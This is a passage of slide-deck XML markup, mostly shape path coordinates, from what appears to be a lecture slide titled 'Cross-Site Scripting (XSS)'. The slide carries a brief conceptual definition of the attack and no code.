                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1847889" y="2663811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853858" y="2602597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858176" y="2541510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860970" y="2480550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1862109" y="2419590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1818933" y="2784334"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1818889" y="2784588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818933" y="2784334"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1827950" y="2723247"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1835316" y="2662414"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1835301" y="2662541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1835316" y="2662414"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1841158" y="2601454"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1845476" y="2540621"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1845458" y="2540875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1845476" y="2540621"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1848270" y="2480042"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1860214" y="2299194"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1847508" y="2299194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849411" y="2419705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1862109" y="2419590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860214" y="2299194"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1852275" y="2179941"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1839507" y="2179941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1847508" y="2299575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1847508" y="2299194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860214" y="2299194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860208" y="2298813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852275" y="2179941"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1838541" y="2061450"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1825791" y="2061450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839507" y="2180195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1839507" y="2179941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852275" y="2179941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852207" y="2178925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838541" y="2061450"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1819186" y="1944610"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1806360" y="1944610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1825791" y="2061831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1825791" y="2061450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838541" y="2061450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838364" y="2059926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819186" y="1944610"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1590078" y="1280400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1575982" y="1280400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576109" y="1280654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627544" y="1385937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673772" y="1493633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714920" y="1603488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1750861" y="1715502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781341" y="1829294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806360" y="1944864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806360" y="1944610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819186" y="1944610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793660" y="1826246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762926" y="1711819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726858" y="1599170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685456" y="1488680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638974" y="1380476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590078" y="1280400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1781214" y="1829040"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1781269" y="1829294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781214" y="1829040"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1750734" y="1715248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1750802" y="1715502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1750734" y="1715248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1714793" y="1603234"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1714875" y="1603488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714793" y="1603234"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1673645" y="1493379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1673740" y="1493633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673645" y="1493379"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1627417" y="1385683"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1627526" y="1385937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627417" y="1385683"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1576082" y="1280605"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1534181" y="1177784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1519721" y="1177784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576082" y="1280605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575982" y="1280400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590078" y="1280400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587285" y="1274685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1534181" y="1177784"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1408052" y="981061"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1392721" y="981061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458761" y="1078216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519848" y="1178038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519721" y="1177784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1534181" y="1177784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530770" y="1171561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469302" y="1071231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408052" y="981061"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1458507" y="1077962"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1458663" y="1078216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458507" y="1077962"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1185108" y="710297"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1167931" y="710297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168185" y="710551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247560" y="797292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322490" y="887589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392848" y="981315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392721" y="981061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1408052" y="981061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403135" y="973822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332396" y="879588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256958" y="788783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185108" y="710297"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1322363" y="887462"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1247306" y="797038"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1247517" y="797292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247306" y="797038"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1167947" y="710314"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1168164" y="710551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1167947" y="710314"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1102214" y="627239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1084365" y="627239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1167947" y="710314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185108" y="710297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177202" y="701661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102214" y="627239"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="1015438" y="548245"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="996481" y="548245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084492" y="627493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084365" y="627239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102214" y="627239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093128" y="618222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015438" y="548245"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="924548" y="473188"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="904533" y="473188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996735" y="548499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996481" y="548245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015438" y="548245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004863" y="538720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924548" y="473188"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="731971" y="336282"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="709080" y="336282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809029" y="402703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="904787" y="473442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="904533" y="473188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924548" y="473188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912407" y="463282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816141" y="392289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731971" y="336282"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="808775" y="402576"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="808947" y="402703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808775" y="402576"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="630331" y="274814"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="605575" y="274814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709334" y="336536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709080" y="336282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731971" y="336282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715938" y="325614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630331" y="274814"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="525678" y="218172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498514" y="218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498768" y="218299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605829" y="275068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605575" y="274814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630331" y="274814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611925" y="263892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525678" y="218172"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="498648" y="218243"/>
                  </a:moveTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="417918" y="166610"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="387897" y="166610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498648" y="218243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498514" y="218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525678" y="218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504356" y="206869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417918" y="166610"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="194797" y="79234"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="156630" y="79234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274232" y="120382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388151" y="166737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387897" y="166610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417918" y="166610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393104" y="155053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278550" y="108444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194797" y="79234"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="273851" y="120255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="274163" y="120382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273851" y="120255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="75025" y="42136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74461" y="48627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71468" y="54302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156884" y="79361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156630" y="79234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194797" y="79234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160567" y="67296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75025" y="42136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="33492" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19597" y="4446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="13775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309" y="27164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="42225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4452" y="56120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13811" y="67347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27217" y="74408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42279" y="75737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56173" y="71328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67401" y="62013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71468" y="54302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36107" y="43928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39663" y="31736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75193" y="31736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71318" y="19607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61960" y="8336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48553" y="1256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33492" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="39663" y="31736"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36107" y="43928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71468" y="54302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74461" y="48627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75025" y="42136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39663" y="31736"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1862454" h="4784090">
                  <a:moveTo>
                    <a:pt x="75193" y="31736"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39663" y="31736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75025" y="42136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75771" y="33545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75193" y="31736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931663" y="6864095"/>
              <a:ext cx="1083945" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1083945" h="704215">
                  <a:moveTo>
                    <a:pt x="966215" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215" y="704087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215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931663" y="6864095"/>
              <a:ext cx="1083945" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1083945" h="704215">
                  <a:moveTo>
                    <a:pt x="0" y="117347"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966215" y="704087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="11734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932423" y="306451"/>
            <a:ext cx="439356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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(XSS)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231895" y="1933193"/>
            <a:ext cx="102006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Attacker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injects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code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trusted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site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executed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client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browser.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offers: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53584" y="760476"/>
            <a:ext cx="6120384" cy="36575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374894" y="6985507"/>
            <a:ext cx="2000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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>3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710173" y="5070094"/>
            <a:ext cx="1096645" cy="716915"/>
            <a:chOff x="5710173" y="5070094"/>
            <a:chExt cx="1096645" cy="716915"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5716523" y="5076444"/>
              <a:ext cx="1083945" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1083945" h="704214">
                  <a:moveTo>
                    <a:pt x="966216" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9227" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966216" y="704088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="694860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="669702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="632400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="586739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083564" y="117347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1074336" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049178" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011876" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966216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716523" y="5076444"/>
              <a:ext cx="1083945" cy="704215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1083945" h="704214">
                  <a:moveTo>
                    <a:pt x="0" y="117347"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9227" y="71687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34385" y="34385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71687" y="9227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117348" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="966216" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
